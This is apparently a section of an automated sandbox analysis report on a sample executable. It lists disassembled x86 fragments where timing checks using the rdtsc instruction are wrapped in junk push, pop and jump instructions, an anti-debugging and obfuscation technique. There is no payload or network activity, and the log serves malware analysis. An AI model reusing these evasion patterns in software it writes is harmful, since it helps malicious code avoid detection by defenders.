Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174DC37 second address: 174DC4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 jmp 00007F3E511046ABh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174DC4F second address: 174DC54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174DDCD second address: 174DDDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174DDDE second address: 174DDF4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3E51171E66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jp 00007F3E51171E66h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174DF8F second address: 174DFC9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F3E511046B4h 0x00000016 popad 0x00000017 jmp 00007F3E511046B4h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174CD92 second address: 174CDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3E51171E79h 0x00000009 jnp 00007F3E51171E66h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174CDB6 second address: 174CDC3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3E511046A8h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174CDC3 second address: 174CDDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F3E51171E66h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jnp 00007F3E51171E66h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174CDDF second address: 174CDE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174CDE8 second address: 174CDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174CDEC second address: 174CDF8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3E511046A6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 175BB52 second address: 175BB5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 175BB5A second address: 175BB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 175BB5F second address: 175BBAA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F3E51171E72h 0x00000008 jmp 00007F3E51171E78h 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3E51171E79h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 175BBAA second address: 175BBAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17663C1 second address: 17663EB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3E51171E66h 0x00000008 jmp 00007F3E51171E6Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F3E51171E72h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1765EF0 second address: 1765F0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F3E511046B3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 176A77F second address: 176A78C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 176A78C second address: 176A7A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3E511046B6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17777AE second address: 17777CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007F3E51171E66h 0x00000009 jmp 00007F3E51171E6Ch 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17777CC second address: 1777801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F3E511046C1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177F452 second address: 177F456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177F456 second address: 177F46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F3E511046AEh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177F46E second address: 177F489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E6Ah 0x00000007 jns 00007F3E51171E66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177E2F1 second address: 177E2F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177E2F7 second address: 177E302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177E302 second address: 177E306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177E306 second address: 177E30E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177E30E second address: 177E319 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F3E511046A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177E5C6 second address: 177E5D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jno 00007F3E51171E66h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177E74E second address: 177E752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177E752 second address: 177E75A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177E75A second address: 177E765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F3E511046A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177E765 second address: 177E771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3E51171E66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177F172 second address: 177F193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007F3E511046B4h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177F193 second address: 177F19C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177F19C second address: 177F1CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3E511046B6h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F3E511046B3h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1781FC6 second address: 1781FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1781FD1 second address: 1781FD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1781CC3 second address: 1781D0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E6Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F3E51171E82h 0x00000011 jmp 00007F3E51171E74h 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1785F5B second address: 1785F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1785F61 second address: 1785F65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17D29FA second address: 17D2A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3E511046ABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17D2A09 second address: 17D2A13 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3E51171E66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17D2A13 second address: 17D2A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3E511046AFh 0x0000000b popad 0x0000000c jg 00007F3E511046B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17D2A33 second address: 17D2A39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1899172 second address: 1899179 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1899179 second address: 18991C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3E51171E66h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F3E51171E75h 0x00000017 jnc 00007F3E51171E66h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F3E51171E71h 0x00000025 js 00007F3E51171E66h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 18991C0 second address: 18991C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 18991C4 second address: 18991CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 18991CA second address: 18991ED instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F3E511046ACh 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F3E511046AFh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1897FA7 second address: 1897FAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1897FAD second address: 1897FB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 189810F second address: 1898113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1898113 second address: 189811B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1898278 second address: 18982B0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3E51171E7Ch 0x00000008 jmp 00007F3E51171E76h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3E51171E76h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1898465 second address: 189848B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3E511046A8h 0x00000008 pushad 0x00000009 jmp 00007F3E511046B9h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 18985FC second address: 189860C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3E51171E72h 0x00000008 jnc 00007F3E51171E66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 18988CA second address: 18988D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 18988D0 second address: 18988D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1898A99 second address: 1898A9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1898A9D second address: 1898AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 189D39E second address: 189D3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 189D5BD second address: 189D608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop ebx 0x0000000e nop 0x0000000f mov edx, ebx 0x00000011 push dword ptr [ebp+12A05957h] 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F3E51171E68h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 mov dword ptr [ebp+12A026B7h], ebx 0x00000037 push F6BE7454h 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 189D608 second address: 189D60C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 18A03C5 second address: 18A03CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 18A03CB second address: 18A03D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 18A03D2 second address: 18A03DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70300DF second address: 70300E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70300E3 second address: 70300E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70300E9 second address: 7030113 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3E511046ABh 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030113 second address: 7030144 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F3E51171E6Eh 0x00000008 sub ch, FFFFFFE8h 0x0000000b jmp 00007F3E51171E6Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov ax, 93DFh 0x00000017 popad 0x00000018 mov ebx, dword ptr [eax+10h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030144 second address: 7030149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030149 second address: 703015C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3E51171E6Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703015C second address: 703018D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007F3E511046AEh 0x00000012 jmp 00007F3E511046B5h 0x00000017 popfd 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703018D second address: 7030206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F3E51171E77h 0x0000000a sub esi, 5352029Eh 0x00000010 jmp 00007F3E51171E79h 0x00000015 popfd 0x00000016 popad 0x00000017 mov dword ptr [esp], esi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F3E51171E73h 0x00000023 sub cx, 8CAEh 0x00000028 jmp 00007F3E51171E79h 0x0000002d popfd 0x0000002e mov ch, 8Dh 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030206 second address: 7030233 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [762C06ECh] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3E511046B7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030233 second address: 7030239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030239 second address: 703023D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703023D second address: 703024D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703024D second address: 7030251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030251 second address: 7030257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030257 second address: 7030292 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 call 00007F3E511046AAh 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007F3E51105723h 0x00000015 jmp 00007F3E511046B1h 0x0000001a xchg eax, edi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F3E511046ADh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030292 second address: 70302B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3E51171E6Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70302B6 second address: 70302BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70302BC second address: 7030322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 pushad 0x0000000a movsx edi, si 0x0000000d pushad 0x0000000e push esi 0x0000000f pop edi 0x00000010 pushfd 0x00000011 jmp 00007F3E51171E6Ah 0x00000016 and eax, 07A27208h 0x0000001c jmp 00007F3E51171E6Bh 0x00000021 popfd 0x00000022 popad 0x00000023 popad 0x00000024 call dword ptr [76290B60h] 0x0000002a mov eax, 75A0E5E0h 0x0000002f ret 0x00000030 jmp 00007F3E51171E76h 0x00000035 push 00000044h 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F3E51171E77h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030322 second address: 7030328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030328 second address: 703032C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
